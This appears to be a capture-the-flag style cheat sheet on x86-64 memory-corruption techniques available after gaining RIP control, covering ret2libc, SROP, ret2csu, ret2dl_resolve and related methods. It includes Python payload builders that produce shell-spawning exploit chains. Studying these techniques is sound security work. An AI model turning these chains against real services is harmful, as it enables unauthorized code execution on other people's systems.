# What after RIP control?

So, you got RIP control. Now what?

Each technique below lists its constraints and, in the same order, what to do when a constraint is not met. The Non-PIE requirement recurs everywhere; see note [1] at the bottom. All sizes are for x86-64 and count bytes written past the saved return address.

## ROP techniques

### NX disabled

#### ret2shellcode, ret2reg, etc.

* **Constraints:**
  - You have to know the address of the shellcode
  - Non-PIE for ret2reg [[1]](#Notes)
  - For ret2reg, the address of the shellcode has to be sitting in a register when you return
  - For ret2reg, you need a `jmp reg` / `call reg` gadget for that register
* **Solutions:**
  - Use any of the other ROP attacks below to leak the address (or to read the shellcode to a known address and return there)
  - Get a binary leak

### Win/flag function

#### ret2win

* **Constraints:**
  - Non-PIE [[1]](#Notes)
  - The win function requires arguments
* **Solutions:**
  - Get a binary leak
  - Use `pop` gadgets or ret2csu (requires a buffer overflow with > 0x8 bytes past the return address, so the argument-setting gadgets fit)

### Have a libc leak and can only write 8 bytes

#### ret2one_gadget

* **Constraints:**
  - Need a libc leak
  - Need to know the libc version of the remote server
  - The constraints printed by one_gadget (e.g. `[rsp+0x70] == NULL` or `rax == NULL`) must hold when the gadget runs
* **Solutions:**
  - If the binary is Non-PIE, leak a libc pointer from the GOT (requires a bof with > 0x8 bytes past the return address)
  - Use [libc-database](https://github.com/niklasb/libc-database)
  - That's tricky: try every gadget one_gadget lists, and fix up the register/stack state with the gadgets you have before returning into it

### Any printing function, e.g. puts, printf, write

#### ret2libc

* **Constraints:**
  - Non-PIE [[1]](#Notes)
  - Need a function which prints bytes
  - The binary should not be hand-written
  - The binary should be dynamically linked
  - Need to know the libc version of the remote server
  - Need a buffer overflow with >= 0x20 bytes past the return address (`pop rdi; ret`, a GOT entry, `puts@plt` and a return to `main` are four 8-byte slots)
* **Solutions:**
  - Get a binary leak
  - That's usually the case
  - Who writes binaries by hand?
  - That's usually the case. (If it isn't, you have easier options: [General ROP](#General-ROP-pop-pop-pop))
  - Use [libc-database](https://github.com/niklasb/libc-database)
  - That's your problem

### Binary has a syscall gadget

#### Sigreturn Oriented Programming (SROP)

* **Constraints:**
  - Non-PIE [[1]](#Notes)
  - Need a `syscall` gadget
  - Need control over RAX (it must be 15, `rt_sigreturn`, when the gadget runs)
  - Need a buffer overflow big enough for the whole sigreturn frame: 248 bytes (0xf8) of frame plus the syscall gadget address and whatever sets RAX, roughly 0x110 bytes past the return address
  - Need the address of a writable area for RSP in some cases
* **Solutions:**
  - Get a binary leak
  - Get a libc leak; libc has `syscall; ret` gadgets
  - RAX can be controlled through return values: `read` returns the number of bytes read, so reading exactly 15 bytes leaves RAX = 15; `write` and any function whose return value you control work the same way
  - You can read your ROP chain to some known address and then stack pivot (requires a stack pivot gadget)
  - Sometimes you need to call functions which need a functional stack. Just point RSP at a .bss address.

### Need to call a function with three arguments

#### ret2csu

* **Constraints:**
  - Non-PIE [[1]](#Notes)
  - Need a buffer overflow with at least 0x40 bytes past the return address if the called function never returns (first gadget, six pops, second gadget), and 0x80 bytes if the chain has to continue afterwards (the second gadget falls through `add rsp, 8` and six more pops before its `ret`)
  - Need a pointer to a function which does nothing to the concerned registers, i.e. RDI, RSI and RDX, e.g. the `DT_FINI` entry in `.dynamic`, which points to `_fini`
* **Solutions:**
  - Get a binary leak
  - You can read your ROP chain to some known address and then stack pivot (requires a stack pivot gadget). If that's not possible, it's your problem
  - Write the address of a `ret` gadget somewhere writable and use the address of that slot as the pointer

### There are no printing functions and you can write to a large area

#### ret2dl_resolve

* **Constraints:**
  - Non-PIE [[1]](#Notes)
  - Need the ability to write to an area reachable by the resolution mechanism, e.g. .bss or the stack, for the forged `Elf64_Rela`, `Elf64_Sym` and symbol name
  - No RELRO or Partial RELRO (lazy binding must still be enabled)
* **Solutions:**
  - Get a binary leak
  - That's the easy one: in a Non-PIE binary .bss is writable and at a known address
  - If you can somehow get the `link_map` and `_dl_runtime_resolve` addresses (normally GOT[1] and GOT[2]), you're fine. With Full RELRO the loader never fills those slots, so they are not in the binary.

### Statically linked binary

#### General ROP pop pop pop

* **Constraints:**
  - Non-PIE [[1]](#Notes)
  - The binary should have gadgets for the concerned registers, i.e. RAX, RDI, RSI, RDX, etc.
* **Solutions:**
  - Get a binary leak
  - Use SROP (requires a RAX gadget and a buffer overflow big enough for the 248-byte sigreturn frame)

### Notes:

[1]: The Non-PIE requirement applies to almost all of them. It can be circumvented by getting a binary leak, e.g. via format strings, strings that are incorrectly or not at all null-terminated, or uninitialized variables.
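A two-stage ret2libc chain for the "Any printing function" section, with the 8-byte one_gadget variant from the ret2one_gadget section as an alternative second stage. This is an added example, not code from the original notes; every address and libc offset in it is constructed for a hypothetical non-PIE x86-64 binary and would be read from the real binary and from libc-database in practice. Stage 1 is exactly the four 8-byte slots behind the >= 0x20 constraint.

```python
import struct

def p64(x):
    """Pack a 64-bit little-endian value (stand-in for pwntools p64)."""
    return struct.pack("<Q", x & 0xFFFFFFFFFFFFFFFF)

def u64(b):
    """Unpack up to 8 little-endian bytes, zero-padding a short leak."""
    return struct.unpack("<Q", b[:8].ljust(8, b"\x00"))[0]

# Constructed, hypothetical addresses for a non-PIE x86-64 binary.
POP_RDI_RET = 0x4011f3   # pop rdi; ret
RET         = 0x40101a   # ret, used only to realign the stack
PUTS_PLT    = 0x401030   # puts@plt
PUTS_GOT    = 0x404018   # puts@got.plt, holds the resolved libc address
MAIN        = 0x401136   # return here after the leak to get a second overflow

# Hypothetical libc offsets (in practice: libc-database / one_gadget output).
LIBC = {"puts": 0x80ed0, "system": 0x50d60, "/bin/sh": 0x1d8698,
        "one_gadget": 0xebc81}

def stage1_leak(padding):
    """puts(puts@got), then return to main: 4 slots = 0x20 bytes of chain."""
    chain = p64(POP_RDI_RET) + p64(PUTS_GOT) + p64(PUTS_PLT) + p64(MAIN)
    return padding + chain

def parse_leak(output):
    """puts stops at the first NUL byte, so a userland pointer comes back as
    its 6 significant bytes followed by the newline puts appends."""
    line = output.split(b"\n", 1)[0]
    return u64(line)

def libc_base(leaked_puts):
    """Base = leaked symbol - its offset; a base that is not page-aligned
    means the offset came from the wrong libc build."""
    base = leaked_puts - LIBC["puts"]
    if base & 0xfff:
        raise ValueError("libc base %#x is not page-aligned: wrong libc?" % base)
    return base

def stage2_system(padding, base):
    """system("/bin/sh").  The extra `ret` keeps RSP 16-byte aligned at the
    call, which system's SSE instructions require."""
    chain = (p64(POP_RDI_RET) + p64(base + LIBC["/bin/sh"])
             + p64(RET) + p64(base + LIBC["system"]))
    return padding + chain

def stage2_one_gadget(padding, base):
    """Second stage when only the 8-byte return address can be overwritten."""
    return padding + p64(base + LIBC["one_gadget"])

if __name__ == "__main__":
    pad = b"A" * 40                                   # hypothetical distance to RIP
    print("stage 1:", stage1_leak(pad).hex())
    # Constructed puts output for a leaked puts at 0x7f6f48080ed0.
    base = libc_base(parse_leak(b"\xd0\x0e\x08\x48\x6f\x7f\n"))
    print("libc base %#x" % base)
    print("stage 2:", stage2_system(pad, base).hex())
```

The libc-version constraint shows up as the alignment check in `libc_base`: with offsets from the wrong libc the computed base is rarely page-aligned, which is a cheap sanity check before sending stage 2.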
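A sigreturn frame builder for the SROP section. This is an added example, not code from the original notes: the field order is the x86-64 `ucontext` layout the kernel reads back in `rt_sigreturn` (the same 248-byte layout pwntools' `SigreturnFrame` uses), and every address (the `pop rax; ret` and `syscall; ret` gadgets, the `/bin/sh` string, the .bss scratch area) is constructed for a hypothetical non-PIE binary. It shows both an `execve` frame and the "read your chain to a known address and pivot" frame, and makes the size constraint concrete.

```python
import struct

def p64(x):
    """Pack a 64-bit little-endian value (stand-in for pwntools p64)."""
    return struct.pack("<Q", x & 0xFFFFFFFFFFFFFFFF)

# x86-64 ucontext fields rt_sigreturn reads from RSP, in order, 8 bytes each.
FRAME_FIELDS = [
    "uc_flags", "uc_link", "ss_sp", "ss_flags", "ss_size",
    "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
    "rdi", "rsi", "rbp", "rbx", "rdx", "rax", "rcx", "rsp", "rip",
    "eflags", "csgsfs", "err", "trapno", "oldmask", "cr2",
    "fpstate", "reserved", "sigmask",
]
FRAME_SIZE = 8 * len(FRAME_FIELDS)                  # 248 == 0xf8
OFFSET = {name: 8 * i for i, name in enumerate(FRAME_FIELDS)}

SYS_READ = 0
SYS_RT_SIGRETURN = 15
SYS_EXECVE = 59

def build_frame(**regs):
    """Serialise a frame.  Unset fields are zero, except csgsfs, which must
    carry the user code segment selector (0x33) or the return faults.
    fpstate stays 0 so the kernel does not try to restore FPU state."""
    values = dict.fromkeys(FRAME_FIELDS, 0)
    values["csgsfs"] = 0x33
    for name, val in regs.items():
        if name not in values:
            raise KeyError("unknown frame field: %s" % name)
        values[name] = val
    return b"".join(p64(values[name]) for name in FRAME_FIELDS)

def srop_chain(padding, pop_rax_ret, syscall_ret, frame):
    """pop rax; ret <- 15, then syscall: the frame must sit exactly at RSP."""
    return (padding + p64(pop_rax_ret) + p64(SYS_RT_SIGRETURN)
            + p64(syscall_ret) + frame)

def srop_execve(padding, pop_rax_ret, syscall_ret, binsh, scratch_stack):
    """execve("/bin/sh", NULL, NULL): RIP lands on `syscall` with RAX=59.
    RSP is pointed at writable .bss so a failed execve does not crash
    on the following `ret`."""
    frame = build_frame(rax=SYS_EXECVE, rdi=binsh, rsi=0, rdx=0,
                        rip=syscall_ret, rsp=scratch_stack)
    return srop_chain(padding, pop_rax_ret, syscall_ret, frame)

def srop_read_and_pivot(padding, pop_rax_ret, syscall_ret, scratch_stack, size):
    """read(0, scratch, size) with RSP already moved to scratch: the `ret`
    after the syscall pops the first slot of whatever was just sent, so a
    second, larger ROP chain runs from a known address."""
    frame = build_frame(rax=SYS_READ, rdi=0, rsi=scratch_stack, rdx=size,
                        rip=syscall_ret, rsp=scratch_stack)
    return srop_chain(padding, pop_rax_ret, syscall_ret, frame)

if __name__ == "__main__":
    # Constructed gadget/data addresses; 40 bytes to the saved RIP.
    chain = srop_execve(b"A" * 40, 0x401182, 0x401184, 0x402010, 0x404800)
    print("payload %d bytes, %#x past the return address"
          % (len(chain), len(chain) - 40))
```

The constraint on RAX is visible in `srop_chain`: if there is no `pop rax` gadget, replace the first two slots by a call that returns 15, e.g. a `read` of exactly 15 bytes, and keep the frame directly after the `syscall` gadget's slot.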
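A chain builder for the ret2csu section. This is an added example, not code from the original notes; the two gadget addresses, the GOT entry and the .bss address are constructed for a hypothetical non-PIE x86-64 binary. It shows why `rbx=0, rbp=1`, where the function pointer goes (a GOT entry, the `DT_FINI` slot, or a writable slot you filled with a `ret` gadget), that the gadget only loads a 32-bit EDI, and where the 0x40 / 0x80 sizes come from. The register-to-argument mapping differs between older and newer `__libc_csu_init` builds, so both layouts are supported.

```python
import struct

def p64(x):
    """Pack a 64-bit little-endian value (stand-in for pwntools p64)."""
    return struct.pack("<Q", x & 0xFFFFFFFFFFFFFFFF)

# The two gadgets at the tail of __libc_csu_init (constructed addresses).
CSU_POP  = 0x40129a   # pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
CSU_CALL = 0x401280   # mov rdx, r15; mov rsi, r14; mov edi, r13d; call [r12+rbx*8]
                      # add rbx, 1; cmp rbp, rbx; jne CSU_CALL; add rsp, 8;
                      # pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
JUNK = 0x4141414141414141

def ret2csu(fn_ptr, arg1, arg2, arg3, then=None, layout="new"):
    """Chain that calls (*fn_ptr)(arg1, arg2, arg3).

    fn_ptr is the address of an 8-byte slot holding the function's address.
    rbx=0 makes the call read [r12]; rbp=1 makes `cmp rbp, rbx` succeed after
    `add rbx, 1`, so the loop body is not re-entered.  If `then` is given the
    chain continues after the call: one slot for `add rsp, 8`, six for the
    second set of pops, then the next return target.
    """
    if arg1 >> 32:
        raise ValueError("the gadget loads only EDI; arg1 must fit in 32 bits")
    if layout == "new":       # r13 -> edi, r14 -> rsi, r15 -> rdx
        r13, r14, r15 = arg1, arg2, arg3
    elif layout == "old":     # older builds: r15d -> edi, r14 -> rsi, r13 -> rdx
        r13, r14, r15 = arg3, arg2, arg1
    else:
        raise ValueError("layout must be 'new' or 'old'")
    chain = (p64(CSU_POP) + p64(0) + p64(1) + p64(fn_ptr)
             + p64(r13) + p64(r14) + p64(r15) + p64(CSU_CALL))
    if then is not None:
        chain += p64(JUNK) * 7 + p64(then)
    return chain

if __name__ == "__main__":
    READ_GOT = 0x404020   # hypothetical read@got.plt: call [READ_GOT] == read(...)
    BSS = 0x404800        # hypothetical writable scratch area
    MAIN = 0x401136
    # read(0, BSS, 0x200) then return to main for another overflow.
    chain = ret2csu(READ_GOT, 0, BSS, 0x200, then=MAIN)
    print("%d bytes (%#x) past the return address" % (len(chain), len(chain)))
```

Only EDI is loaded, so the first argument can be a file descriptor or a small count but not a 64-bit pointer; for a pointer in RDI, set RSI/RDX with ret2csu and follow it with a plain `pop rdi; ret` before the real call.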